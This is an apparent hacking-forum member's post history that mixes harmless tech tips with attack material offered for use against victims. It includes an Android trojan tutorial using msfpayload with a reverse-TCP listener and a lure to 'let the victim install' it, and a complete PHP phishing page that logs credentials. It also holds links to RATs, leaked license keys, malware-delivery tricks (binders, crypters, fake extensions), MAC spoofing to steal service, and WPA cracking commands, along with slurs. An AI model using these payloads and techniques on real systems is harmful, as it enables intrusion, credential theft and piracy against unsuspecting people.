mesvak

Members
  • Content Count

    2,691
  • Last visited

  • Days Won

    4

Everything posted by mesvak

  1. [hide] https://www.upload.ee/files/10010128/Japan.txt.html [/hide]
  2. [hide] : 1. Select any file or folder or create new folder.:file_folder: 2. Right click on it, select 'Rename' or simply press 'F2' 3. Press and hold the 'Alt' key. While holding the Alt key, type numbers '0160' from the numpad Note: Type the numbers '0160' from the numpad, that is, the numbers present on the right side of the keyboard 4. Press Enter and the nameless file or folder will be created Reason :The file or folder that seems nameless is actually named with a single space [/hide]
  3. [hide] $$$ £$£T N0D£ MES\/AK CH$$$ BACG-XNAR-T7FM-6UBC-SFG3 $$$ £$£T N0D£ MES\/AK CH$$$ TJP7-XWAW-3B7T-RWXX-RRCP $$$ £$£T N0D£ MES\/AK CH$$$ 22T9-XCP6-MWMR-A6FS-B5MS $$$ £$£T N0D£ MES\/AK CH$$$ M33F-XDJ3-5D4X-UFH7-4KRG $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33J-PAVP-PD52-A2S2 $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-536B-BBWD-PBDT $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5DHE-ED85-MTWX $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5AAE-E99K-DCUE $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5C99-9WKM-B5VU $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5AK3-3H6A-6W3G $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-528N-NCBG-UHGD $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5B8U-UUNK-X6CK $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5RX3-3X5N-XSA3 $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33E-XDTA-AKX9-NXEW $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33E-XAHW-W7ER-AACA $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33E-XC5M-M9V2-5TCM $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33E-X9RM-MMBH-NXFE $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33E-XAJK-K8DW-3TEE $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5N4U-UTAK-3N46 $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5HPB-BDK6-E7UE $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5AHB-BAS4-2VTF $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5W3G-GNJM-GEV9 $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-59GC-CGG8-STNP $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5UBN-N225-9WDX $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5HJT-T5DU-X7MH $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-592E-EECF-B9AP $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5BAT-TW4J-FTA6 $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5239-9HE6-86TS $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5AJF-F2J4-GVD6 $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5VNA-A8HC-N7PA $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-59S3-3956-RF55 $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33F-5AHE-EBB9-4G97 $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33K-M35W-WTXH-4CNA $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33K-M3FK-KGV9-TS5S $$$ £$£T N0D£ MES\/AK CH$$$ RUAW-W33K-MVMN-NS55-5WJ8 [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme
  4. [hide] Mad Metasploit is an awesome metasploit collection which include metasploit custom modules, plugins and resource script. https://github.com/hahwul/mad-metasploit [/hide]
  5. TAKE NO RESPONSIBILITY BTW AND JUST ONE THING DONT RUN THEM ON UR FUCKING PC NEWBIES AND TELL ME THOSE ARE INFECTED NIGGAS THOSE ARE RATS RATS ARE FOR WHAT FOR FUCKING UP PCS nOT TO TOUCHING THEM SMOOTHLY AND RUNIN HARD ON OTHER ONES PCS SO WATCHOUT PLEBS [hide] https://mega.nz/#F!gqpn2LoY!jnDVppWwOVBTN1IUMtOgag [/hide]
  6. [hide] https://www.upload.ee/files/10008495/China__2_.txt.html [/hide]
  7. [hide] https://www.upload.ee/files/10008493/Australia.txt.html [/hide]
  8. [hide] https://www.upload.ee/files/10008492/Czech.txt.html [/hide]
  9. [hide] Just follow the below steps to register your .tk, .ml, .cf, .ga, .gq domain name for 1 year absolutely free of cost. After the completion, we will discuss on how to use it as a custom domain on Blogger. 1.Go to Freenom.com and check availability by entering a great domain name for your blog. 2.If it is available, click on Get it now! button and the selected domain will be added to your cart. 3.After that, Click on checkout tab. 4.On the next page, change Period from 3 months to 12 months ( Don't worry, it remains free) and Click Continue 5.Now enter your email address in the given space or you can use your social profile for login. If you want to sign up using email address then enter it and click on Verify my Email. 6.Check! You will receive a confirmation link to your email address. Simply, click on that. 7. Congrats! You have registered your free domain. ? [/hide]
  10. [hide] This is a tutorial explaining how to hack android phones & Telegram with Kali. (Still ,you may already know about this) Step 1: Open a terminal, and make a Trojan .apk You can do this by typing : 'msfpayload android/meterpreter/reversetcp LHOST=95.108.142.138 R > /root/Desktop/Telegram.apk' (replace LHOST with your own IP) You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section) Step 2: Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : 'msfconsole' Step 3: Set-Up a Listener: After it loads(it will take time), load the multi-handler exploit by typing : 'use exploit/multi/handler' Set up a (reverse) payload by typing : 'set payload android/ meterpreter/reversetcp' To set L host type : 'set LHOST 192.168.0.4' (Even if you are hacking on WAN type your private/internal IP here not the public/external) Step 4: Exploit! At last type: exploit to start the listener. Copy the application that you made (Telegram.apk) from the root folder, to you android phone. send file .... Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone) However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install. And when he clicks Open... Step 5: BOOM! There comes the meterpreter prompt [/hide]
  11. [hide] I prepared this post because many of us store videos, photo, music games and many more so that we are obliged to delete some files when it's full so I have a solution for you. let's get started. Notice : In this method we can only increase from 2gb, 4gb, 8gb up to 16 gb. If I get another method to increase above 16gb I will update my post soon. So let's start step by step : Step 1 : First of all Download sdata tool software. You can get it by typing this let key word in Google ? " zip/2kWbL88r/ SDATA.html " Step 2 : After you download sdata. zip extract it then, run sdata tool as an administrator Step 3 : Select the flash drive or sd card letter you want to increase ( it must be formatted ) Step 4 : Then there is an option to choose to increase to 4gb, 8gb & 16gb so you will not choose directly what you want it works like, if the flash drive/sd-card is 2gb you will choose 4gb then to 8gb & then to16gb. Step 5 : Finally After you choose your desire gb with the above prociuder click the compress button. N.B : Don't format the flash drive or sd card after you increased because the trick will disappear. [/hide]
  12. [hide] ▪️ To avoid spam from certain sites, use disposable temporary email services to sign up for stuffs: ▪️ AccountKiller.com guides you on how to delete your online accounts from popular websites. ▪️ Check whether a username is taken or available on popular sites using Namechk.com. ▪️ Want to convert YouTube video to GIF? Add “gif” before “youtube.com”. [/hide]
  13. [hide] 1.Tamper Data 2.Hack Bar 3.Live HTTP headers 4.User-Agent Switcher 5.Flagfox 6.Domain Details 7.Cookie Manager+ 8.HttpFox 9.XSS Me 10.Fireforce 11.Wappalyzer 12.PassiveRecon 13.Blur 14.Poster 15.NoScript 16.CSRF Finder 17.Copy As Plain Text 18.FoxyProxy Standard 19.RightClickXSS 20.Export/import cookies 21.Firebug 22.CryptoFox 23.NoRedirect 24.Ghostery 25.Privacy Badger 26.Disconnect 27.Adblock Plus 28.Hoxx VPN 29.buffer overflows *#Maps* 1.Network Plus 2.CEH 3.Linux Commands 4.Cmd Commands 5.Kali Linux Tools 6.Windows Tools 7.Learning Bugs 8.Learning Python 9.Learning Ruby *#Tools* 1.DDoS 2.Forensics 3.Programming 4.Exploitation 5.Phone Hacking 6.Server Hacking 7.Client Hacking 8.Website Hacking 9.Network Hacking 10.Wireless Hacking 11.Reverse Engeenering 12.Information Gathering *#DDoS* 1.MDK3 2.LOIC 3.HULK 4.DDOSIM 5.Ufonet 6.Hping3 7.Xerxes 8.Hammer 9.Slowloris 10.Websploit 11.GoldenEye 12.Metasploit 13.Aireplay-ng 14.Slowhttptest 15.CMD? *#Forensics* 1.COFEE 2.Volafox 3.Autopsy 4.Foremost 5.Hashdeep 6.Binwalk *#Programming* 1.Notepad++ 2.Visual Studio 3.Text Editor Many more...... *#Exploitation* 1.Metasploit 2.Sqlmap 3.Core Imact 4.W3af 5.BeEF 6.Dradis *#Phone Hacking* 1.Metasploit 2.Apktool 3.Droidjack 4.RATs 5.Spywere 6.Backdoor playlode *#Server Hacking* 1.SQLmap 2.Jsql 3.Havij 4.Hydra 5.Metasploit 6.Armitage 7.Brupsuite 8.Owasp-ZAP 9.Netsparker 10.Acunetix 11.OpenVAS *#Client Hacking* 1.Darkcomet 2.FatRat 3.Veil-Evasion 4.Shallter 5.Unicorn 6.Setoolkit 7.Armitage 8.BeEF-Framework 9.EmPyre 10.FakeImageExploiter 11.Pupy 12.DFU-Programmer 13.Cobalt Strike 14.Exploitpack 15.Gcat 16.Crowbar *#Website Hacking* 1.Sniper 2.Owasp-ZAP 3.Brupsuite 4.Netsparker 5.Acunetix 6.SQLmap 7.Xsser 8.WPScan 9.Joomrra 10.Joomscan 11.WPSeku 12.XSStrike 13.Kadimus 14.jexboss 15.CMSmap 16.brut3k1t 17.0d1n 18.CloudFail 19.Arachni 20.Nikto 21.Webscarab 22.Nmap 23.Vbscan 24.Sentry MBA *#Network Hacking* 1.MITMf 2.Bettercap 3.Ettercap 4.Tcpdump 5.Wireshark 6.Driftnet 7.SSLstrip 8.Armitage 9.Metasploit 10.Xerosploit 11.Sparta 12.Hydra 13.some scripts 14Nmap *#Wireless Hacking* 1.Wifite 2.Airodump-ng 3.Aireplay-ng 4.Wash 5.WiFi Pumpkin 6.Wifiphisher 7.Fluxion 8.Infernal Twin 9.WPSpin *#Reverse Engeenering* 1.OWASP-ZSC 2.OllyDBG 3.Apktool *#Methods* 1.DDoS 2.Forensics 3.Programming 4.Exploitation 5.Phone Hacking 6.Server Hacking 7.Client Hacking 8.Website Hacking 9.Network Hacking 10.Wireless Hacking 11.Reverse Engeenering 12.Information Gathering *#DDoS* 1.Nuke 2.Botnet 3.Zero Day 4.Slowloris 5.SYN Flood 6.Reflected 7.Multi Vector 8.Peer to Peer 9.Ping of Death 10.Protocol Flood 11.Application Level *#Forensics* 1.History 2.Etymology 3.Maturation 4.Toxicology 5.References 6.Bibliography 7.Fingerprints 8.Anthropometry *#Programming* 1.C 2.PHP 3.ASP 4.Ruby 5.Bash 6.Perl 7.Python 8.Assembly 9.JavaScript And many more,....... *#Exploitation* 1.RCE 2.BOF 3.POC 4.SQL Injection 5.Code Execution 6.Command Injection 7.Abritrary Library *#Phone Hacking* 1.BOF 2.RCE 3.DOS 4.Bind RAT 5.spywere *#Server Hacking* 1.BOF 2.RCE 3.SSRF 4.Zero Day 5.Privilage 6.Bruteforce 7.Upload Shell 8.SQL Injection *#Client Hacking* 1.RAT 2.BOF 3.RCE 4.Virus 5.Binder 6.Cryption 7.Phishing 8.Backdoor 9.Keylogger 10.Privilage 11.Bruteforce 12.Steal Passwords 13.Social Engeenering *#Website Hacking* 1.DOS 2.XSS 3.RCE 4.XXE 5.CSRF 6.SSRF 7.LFI/RFI 8.Cracking 9.Bruteforce 10.Upload Shell 11.SQL Injection 12.Google Hacking 13.Xpath Injection 14.BoF *#Network Hacking* 1.BOF 2.RCE 3.VoIP 4.MITM 5.Spoof 6.Sniff 7.Bruteforce 8.Cupture Packet *#Wireless Hacking* 1.WPSpin 2.FakeAP 3.Eviltwin 4.Handshake 5.mitm 6.evilgnix *#Reverse Engeenering* 1.Compiler 2.Shellcode 3.App Cracking 4.Serial Cracking 5.Decompile Softwares *#Information Gathering* 1.Enum 2.Recon 3.Whois 4.Email Contact 5.Phone Contact 6.Service Status 7.Protocol Analysis 8.doxerv2.0 source--one_website [/hide]
  14. [hide] ➖➖➖➖➖➖➖➖➖➖➖➖ For this trick you would need a hosting account, you can get that quickly. Register yourself at t35, host1free, 110mb etc. Note- 110mb checks for phishing page on their site and removes them. So now u have a hosting account, so let's create a fake page- First, go to the target site. In your browser select Save As from the File menu and save the website on your hard disk with name "login.htm". Or right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm". Now the second part of the hack- Go to Notepad and copy this into it- <?php header ('Location: http://www.facebook.com'); $handle = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> Replace facebook.com with the URL you want the user to go after he clicks on submit button. Save the page as fish.php Now you need to edit the "login.htm" file we save earlier. So go to that and open it with notepad. Now search for any htm like "action=" which has something with login. And replace the URL with "fish.php". Also, create a blank text file with the name "log.txt". This file would be used to save your logins and passwords. Now you are done, Go to your hosting account and upload all the files to your server. Now go to the URL provided by your host. Like - http://g00glepage.t35.com/login.htm And you would see the fake page as it is. Now enter the username and password. Check the log.txt file. The password and username you entered previously would be saved in the log.txt file including other details such as time stamp. Here you have a working phishing page. Note:- For this trick require website on which you have to put three file fish.php,login.html,log.txt (where your password will be store). This tutorial is for educational purpose only. [/hide]
  15. [hide] You might think how is that possible? Well, it’s very simple to understand. Mac Spoofing allows you to change the Physical Address of your router or computer through which you access the network. Even if you didn’t pay the bill, you can use someone else’s Mac address and still access the internet. The procedure is very simple. You need to find someone else’s Mac address using the same network (works best for local ISPs). Then you will change your Mac address to theirs and you will be able to access the internet. welp recently i tried to hack some routers after doing that i would get access to router and find the ips and mac ips which are connected to router then will pretend that i am that person with changing my mac and will get access to router net access simple niga [/hide]
  16. [hide] 1. Censys.io 2. Shodan.io 3. Viz.Greynoise.io/table 4. Zoomeye.org 5. Fofa.so 6. Onyphe.io 7. App.binaryedge.io 8. Hunter.io 9. Wigle.net 10. Ghostproject.fr [/hide]
  17. [hide] You must have heard of dark web or deep web and as you know its a scary place and its full of skilled cybercriminals. So it becomes necessary to secure yourself while visiting this wild part of the internet. Today I am going to tell you about some precautions that you should use while surfing the dark web. Secure Your Browser Securing your browser must be your top priority as hackers can exploit it to gain access to your machine. So let's talk about some ways by which you can make your browser more hardened. 1. If a website doesn’t use HTTPS, don’t use it. 2. Disable JavaScript using NoScript plugin 3. Disable all the plugins as they can be used to track/ exploit your system 4. Don’t use search Engines like Google which track you. Instead, go for DuckDuckGo which doesn’t keep the records or inject tracking cookies into your browser 5. If you download something from the dark web its ok but consider opening it in a sandbox or a virtual machine. 6. Don’t use torrent because torrent uses a peer to peer connection instead of using the TOR network. 7. Don’t maximise TOR browser’s windows as it can be used to determine the screen size of your device. Secure your browser even more Enter about: config in your browser tab and press enter. Then make the following changes: javascript.enabled false network.http.sendRefererHeader 0 network.http.sendSecureXSiteReferrer false extensions.torbutton.saved.sendSecureXSiteReferrer false network.cookie.cookieBehavior 2 browser.cache.memory.enable false Secure Your Operating System If your operating systems are easy to hack, then it could be a problem…a nasty problem. 1. Don’t use windows because windows are straightforward to exploit, prefer Linux. 2. It is good to use tor in a virtual machine so you can minimise the damage in case you get infected by some malware. 3. Use a firewall. 4. Keep your system up to date. Secure Your Identity And the most important thing is to hide your identity. 1. If you have to sign up for something, use a disposable email service such as throwaway email 2. Choose usernames and passwords carefully. They should not have any link to your real identity. 3. Send messages in chat rooms only when it is necessary and do not reveal any information. 4. You will eventually find scam sites and phishing sites, so use your mind and stay away from them. 5. Don’t do something which might grab the attention of legal authorities like watching child porn. Do not watch child porn at all, even for the sake of curiosity. Stay away from it. 6. If you have to upload an image somewhere, wipe its EXIF data first. And don’t upload any photos which reveal anything about your personal life. Like the colour of your cat. Still not secure? Here you go! 1. Get a new laptop 2. Get a new USB and install Tails in it. Tails is a Linux distro dedicated to security and privacy. 3. Now install tor and set TOR browser’s security setting to high. 4. Follow all the security measures we have discussed above. 5. That's all. That’s all for now. I hope you enjoyed this article. Keep learning! Stay safe! :) don't get involved for Jesus sake nigas [/hide]
  18. [hide] 1. Pre-engagement interactions: This step defines all the pre-engagement activities and scope definitions, basically everything you need to discuss with the client before the testing starts. 2. Intelligence gathering: This phase is all about collecting information about the target under test, by connecting to the target directly or passively, without connecting to the target at all. 3. Threat modeling: This phase involves matching the information uncovered to the assets to find the areas with the highest threat level. 4. Vulnerability analysis: This involves finding and identifying known and unknown vulnerabilities and validating them. 5. Exploitation: This phase works on taking advantage of the vulnerabilities discovered in the previous phase. This typically means that we are trying to gain access to the target. 6. Post-exploitation: The actual tasks to perform at the target, which involve downloading a file, shutting a system down, creating a new user account on the target, and so on, are parts of this phase. This phase describes what you need to do after exploitation. 7. Reporting: This phase includes summing up the results of the test in a file and the possible suggestions and recommendations to fix the current weaknesses in the target. And much more as its getting updated every month or 2 weeks [/hide]
  19. [hide] WLANAudit is a WiFi hacker iOS application which is quite similar to the other WiFi hacking apps available for iPhone. Did you know that you can easily hack the WPA and WPA2 passwords of the routers which haven't changed their default passwords?This Wi-Fi app is here to help you with the same by helping you in breaking the passwords of secure and protected Wi-Fi networks. [/hide]
  20. [hide] 1.Binder - Binder is a software which is used to bind orcollaborate the server or virus you have created with some other file like a MP3,JPEG or any other file.You can fool the victim by sending him a song or picture and as soon as he opens the picture or song the Binder also gets open and starts working. 2.Crypter - A crypter is a tool which changes the binary code of the .exe (virus,RAT etc.)file andapplies many encryptions on it which makes the .exe file undetectable.You can use Chrome Crypter as crypter. 3.Zipping - Another smart way to send files is by putting yourserver in a Zipped folder and then sending it to the victim. Zipping the file changes the extension of the server from .exe to .zip,which bypasses the file transfer facility of gmail , facebook, yahoo etc.. USE WINRAR & give password of that file, so AntiVirus do not scan file. 4.Extension - You can change the extension of the Server you want to send as it is not possible to send .exe files,so you can change the extension of .exe to .jpeg,.mp3 etc. when you save the file and then send it the victim.But in this method you will have to tell the victim to change the extension back to .exe after he/she receives the server. This method can only be used in cases where the victim is very dumb and has no knowledge of this field. A person who is not much interested in cyber security should have knowledge of above mentioned methods as they can be used against anyone. [/hide]
  21. [hide] 1. Dictionary attack : The dictionary attack uses a simple file containing words that can be found in a dictionary, hence its rather straightforward name. In other words, this attack uses precisely the kind of words that many people use as their password. Cleverly grouping words such as "letmein" or "superadministratorguy" will not prevent your password from being cracked this way – well, not for more than a few extra seconds. 2. Brute force attack Similar to the dictionary attack, the brute force attack comes with a bonus for the hacker. Instead of only using words, a brute force attack lets them detect non-dictionary words by working through all possible alpha-numeric combinations from aaa1 to zzz10. It’s not quick, provided your password is over a handful of characters long, but it will uncover your password eventually. Brute force attacks can be shortened by throwing additional computing horsepower, in terms of both processing power – including harnessing the power of your video card GPU – and machine numbers, such as using distributed computing models like online bitcoin miners. 3. Rainbow table attack Rainbow tables aren't as colourful as their name may imply but, for a hacker, your password could well be at the end of it. In the most straightforward way possible, you can boil a rainbow table down into a list of pre-computed hashes – the numerical value used when encrypting a password. This table contains hashes of all possible password combinations for any given hashing algorithm. Rainbow tables are attractive as it reduces the time needed to crack a password hash to only just looking something up in a list. However, rainbow tables are huge, unwieldy things. They require serious computing power to run, and a table becomes useless if the hash it's trying to find has been "salted" by the addition of random characters to its password ahead of hashing the algorithm. There is the talk of salted rainbow tables existing, but these would be so large as to be challenging to use in practice. They would likely only work with a predefined "random character" set and password strings below 12 characters as the size of the table would be prohibitive to even state-level hackers otherwise. 4. Phishing There's an easy way to hack: ask the user for his or her password. A phishing email leads the unsuspecting reader to a faked log in page associated with whatever service it is the hacker wants to access, requesting the user to put right some terrible problem with their security. That page then skims their password, and the hacker can use it for their purpose. Why bother going to the trouble of cracking the password when the user will happily give it to you niga anyway? [/hide]
  22. [hide] Tools need to be downloaded:- Hcxdumptool Hcxpcaptool Hashcat Steps:- 1] Request PMKID from the router Unlike older techniques where you had to wait until a user connected to the access point so that you can capture the 4-way handshake that is of EAPOL.This new method for finding out the password credentials does not require that anymore. The attack works on the RSN-IE or Robust Security Network Information Element. It only uses one frame which it requests from the wireless router. 2] Install Hcxdumptool & Hcxpcaptool This is a tool that will help you to capture the PMKID packet from the access point. After capturing the frame, it can also dump it into a file for you. Below are some features of Hcxdumptool: Can easily capture identities and usernames from a WLAN.Can easily capture passwords, plain master keys, handshakes and PMKIDs from traffic on WLAN. After installing this tool run the below command in the CLI. $ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status The command displayed above will dump the frame to a file. 3] After doing the above step now you will need to extract some contents from the frame file. This will be in the pcapng format. You can easily convert this into a hash format which the popular program ‘Hashcat‘ can accept. Use the below command to extract the pcapng file.◾️ $ ./hcxpcaptool -z test.16800 test.pcapng 4] Using Hashcat to Crack the Wifi Password (WPA PSK Pre-Shared Key Recovery) Hashcat is a tool used a lot in the security and penetration testing field. It is used by both hackers and researchers for finding out passwords by cracking their hash. After finding out the hash of the password you can enter the password in hashcat and it will find it out for you. It will take some time depending on how complex the password is of the wireless network. Enter the cmd below and run hashcat. $ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’ [/hide]